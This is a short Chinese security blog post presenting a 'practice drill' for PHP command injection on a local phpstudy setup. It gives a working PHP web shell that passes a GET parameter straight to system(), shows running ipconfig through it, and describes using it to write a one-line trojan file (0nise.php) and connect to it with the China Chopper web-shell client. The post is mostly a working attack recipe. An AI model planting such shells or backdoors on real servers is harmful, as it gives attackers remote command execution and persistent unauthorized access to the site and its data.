蜗蜗侠's Blog-关注网络安全移动版

主页 > 资源分享 >

利用php进行命令注入攻击演练

本机搭建php环境我用的是phpstudy
软件下载地址:http://www.baidu.com
自己配置phpstudy 我就不废话了


网站根目录新建index.php  名字随便啊  index 我只是图一个方便而已~~!

<?$cmd = $_GET["cmd"];echo "<pre>";system($cmd);echo "</pre>";?>
代码写入  然后本机访问网站


接下来传入我们要执行的cmd的命令
通过get的请求方式来 传入


把ipconfig这个值赋值给cmd变量

$cmd = $_GET["cmd"];
然后$cmd通过get方式得到用户传入值

system($cmd);
system()函数进行执行

本机测试新建一个php脚本文件
打开本机cmd,测试创一个脚本文件写入内容

查看文件是否写入

写入成功!php环境执行写入一句话木马!


ok写入成功!,访问0nise.php


ok一句话解析成功!菜刀连接~~
(责任编辑:蜗蜗侠)